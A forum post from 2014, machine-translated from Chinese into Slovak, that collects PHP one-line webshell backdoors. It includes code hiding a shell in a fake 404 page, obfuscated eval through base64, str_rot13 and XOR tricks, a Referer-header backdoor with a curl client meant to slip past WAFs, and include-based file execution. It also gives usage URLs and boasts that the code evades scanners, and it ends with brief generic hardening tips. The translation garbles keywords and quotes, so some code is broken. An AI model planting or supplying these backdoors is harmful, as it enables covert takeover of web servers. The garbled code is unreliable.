Tieto PHP backdoor programy pristupujeme s učením a veľa PHP backdoor kódu nám umožňuje vidieť, akí dobre mienení programátori majú.
Silné PHP zadné vrátka v jednej vete
Tento druh zadných vrátok umožňuje používať webové stránky,Správcovia serverov sú veľmi problémoví a často musia meniť metódy na vykonávanie rôznych detekcií, pričom mnohé nové techniky písania nie je možné objaviť a riešiť bežnými metódami detekcie.
Dnes spočítame niekoľko zaujímavých PHP trójskych kóňov.
1. Skrytie PHP poníkov pomocou 404 strán:
[mw_shl_code=php, pravda] <!DOCTYPE HTML VEREJNÉ "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Nenájdené</title>
</head><body>
<h1>Nenájdené</h1>
<p>Požadovaná URL adresa sa na tomto serveri nenašla.</p>
</body></html>
<?php
@preg_replace("/[pageerror]/e",$_POST['error'],"saft");
hlavička ('HTTP/1.1 404 Not Found');
?>[/mw_shl_code]
Stránka 404 je bežne používaný súbor na webovej stránke a len málo ľudí ho bude kontrolovať a upravovať po všeobecnom odporúčaní, takže ho môžeme použiť na skrytie zadných vrátok.
2. Skryté PHP bez funkcií v jednej vete:
[mw_shl_code=php,true]<?php
session_start();
$_POST['code'] & $_SESSION['theCode'] = trim($_POST['code']);
$_SESSION['theCode']&preg_replace ('\'a\'eis','e'.' v’.‘ a’.‘ l’.‘ (base64_decode($_SESSION[\'theCode\']))','a');
?>[/mw_shl_code]
Priraďte $_POST['code'] k $_SESSION['theCode'] a potom vykonajte $_SESSION['theCode'], pričom zvýraznením je, že neexistuje podpisový kód.
Ak použijete skenovací nástroj na kontrolu kódu, nealarmuje a dosiahne cieľ.
3. Super nenápadné PHP zadné dvierka:
[mw_shl_code=php,true]<?php $_GET[a]($_GET);?>
[/mw_shl_code]
Funkcia GET sama o sebe tvorí trójsky kôň;
Ako používať:
[mw_shl_code=php, pravda]
?a=assert&b=${fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28P[/mw_shl_code]
Po vykonaní aktuálny adresár vygeneruje trojana c.php vety, keď je parameter A vyhodnotený, generovanie chybového trójskeho koňa zlyhalo, a keď sa asertuje, tiež nahlási chybu, ale vygeneruje trójskeho koňa, ktorého nemožno podceňovať.
Level request, kód na spustenie PHP backdoor:
Táto metóda je implementovaná s dvoma súbormi, súborom 1
[mw_shl_code=php,true]<?php
//1.php
hlavička ('Content-type:text/html; charset=utf-8′);
parse_str($_SERVER['HTTP_REFERER'], $a);
if(reset($a) == '10'& count($a) == 9) {
eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));
}
?>[/mw_shl_code]
Dokument 2
[mw_shl_code=php,true]<?php
//2.php
hlavička ('Content-type:text/html; charset=utf-8′);
//要执行的代码
$code= <<<KÓD
phpinfo();
KÓD;
//进行base64编码
$code= base64_encode($code);
//构造referer字符串
$referer= "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";
//后门url
$url= 'http://localhost/test1/1.php';
$ch= curl_init();
$options= pole(
CURLOPT_URL => $url,
CURLOPT_HEADER => NEPRAVDA,
CURLOPT_RETURNTRANSFER => PRAVDA,
CURLOPT_REFERER => $referer
);
curl_setopt_array($ch, $options);
echocurl_exec($ch);
?>[/mw_shl_code]
Spustite kód kódovaný base64 cez HTTP_REFERER v HTTP požiadavke, aby ste dosiahli efekt zadných vrátok.
Je dobré použiť tento nápad na obchádzanie WAF.
4.PHP nástroj na generátor zadných vrátok
weevely je špecifický pre PHPWebshellový bezplatný softvér môže byť použitý na simuláciu pripojenia podobného telnetu, Weevely sa zvyčajne používa na zneužívanie webových programov, skrytie zadných vrátok alebo použitie metód podobných telnetu namiesto správy webových stránok, serverový PHP kód generovaný Weevely je kódovaný v base64, takže môže oklamať hlavný antivírusový softvér a IDS, Keď nahráte serverový kód, zvyčajne ho môžete spustiť priamo cez Weevely.
Funkcie používané v zadných dvierkach sú bežne používané na spracovanie reťazcov a funkcie ako eval a systém, ktoré slúžia ako inšpekčné pravidlá, sa neobjavia priamo v kóde, takže zadný súbor môže obísť kontrolu nástroja na vyhľadávanie zadných dvierok. Skenovanie pomocou nástroja na detekciu zadných vrátok tmavej skupiny ukazuje, že súbor nie je ohrozený.
Vyššie uvedené je všeobecným úvodom a relevantné metódy používania tu nie sú predstavené, ide o jednoduchú popularizáciu vedy.
4. Tri deformované jednovetné PHP trojány
Prvá:
[mw_shl_code=php,true]<?php ($_=@$_GET[2]).@$_($_POST[1])?>
[/mw_shl_code]
Druhý
[mw_shl_code=php,true]<?php
$_=“”;
$_[+“”]=”;
$_=“$_”.“”;
$_=($_[+“”]|“ �”). ($_[+“”]|“”). ($_[+“”]^“�”);
?>
<?php ${'_'.$_}['_'](${'_'.$_}['__']);?>[/mw_shl_code]
Napíšte http://site/2.php?_=assert&__=eval($_POST['pass']) heslo do kuchynského noža je pass.
Ak použijete dodatočné údaje kuchynského noža, sú viac skryté, alebo môžete použiť iné injekčné nástroje, pretože sú odoslané po odoslaní.
Tretia
[mw_shl_code=php, pravda] ($b 4dboy= $_POST['b4dboy']) & @preg_replace('/ad/e','@'.str_rot13('riny').' ($b 4dboy)', 'pridať'); [/mw_shl_code]
str_rot13 ("riny") je zakódované hodnotenie, ktoré úplne obchádza kľúčové slová bez straty efektu, čo spôsobuje, že ľudia zvracajú krv!
5. Nakoniec uveďte niekoľko pokročilých PHP trójskych dvierok:
1、
[mw_shl_code=php,true]$hh= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$hh("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
2、
[mw_shl_code=php,true]$filename=$_GET['xbid'];
include($filename); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行
3、
[mw_shl_code=php,true]$reg="c"." o”.“ p”.“ y”;
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
[/mw_shl_code]
//重命名任何文件
4、
[mw_shl_code=php,true]$gzid= "p"." r”.“ e”.“ g”.“ _”.“ r”.“ e”.“ p”.“ l”.“ a”.“ c”.“ e”;
$gzid("/[discuz]/e",$_POST['h'],"Access"); [/mw_shl_code]
//菜刀一句话
5、
[mw_shl_code=php,true]include($uid); [/mw_shl_code]
//危险的include函数,直接编译任何文件为php格式运行,POST
[mw_shl_code=php,true]www.xxx.com/index.php?uid=/home/www/bbs/image.gif [/mw_shl_code]
//gif插一句话
Na záver, tieto PHP zadné vrátka možno opísať ako kompletné, ak nebudete opatrní, určite budete oklamaní, a aká je dnes najvyššia priorita nášho článku? Kľúčové body sú uvedené v zhrnutí nižšie!
Ako sa vysporiadať s PHP jednovetnými zadnými dvierkami:
Zdôrazňujeme niekoľko kľúčových bodov a ak si prečítate tento článok, myslím, že nie ste laik, takže nebudem zdĺhavý:
- Dávajte pozor na bezpečnosť pri písaní PHP programov
- Serverové logy by sa mali často čítať a zálohovať
- Prísne priradenie povolení pre každú lokalitu
- Časté dávkové bezpečnostné kontroly dynamických súborov a adresárov
- Naučte sa, ako vykonávať manuálne antivírusové "Behavioral Judgment Investigation and Killing"
- Zostaňte naladení, alebo sa infiltrujte do aktívneho tábora kybernetickej bezpečnosti
- Dokonca aj funkcia môže byť použitá ako pravidlo pre hierarchické spracovanie serverového prostredia
Veríme, že keď je viac stránok na správu a veľké množstvo dát, mali by sme rozumne použiť niektoré pomocné nástroje, ale nemali by sme sa úplne spoliehať na tieto nástroje, technológie sa neustále aktualizujú a zlepšujú, najdôležitejšie je, aby ste sa naučili a pochopili myslenie písania týchto silných zadných vrátok, a premena úlohy vám môže priniesť väčší pokrok.
|
Zverejnené 1. 12. 2014 21:41:13
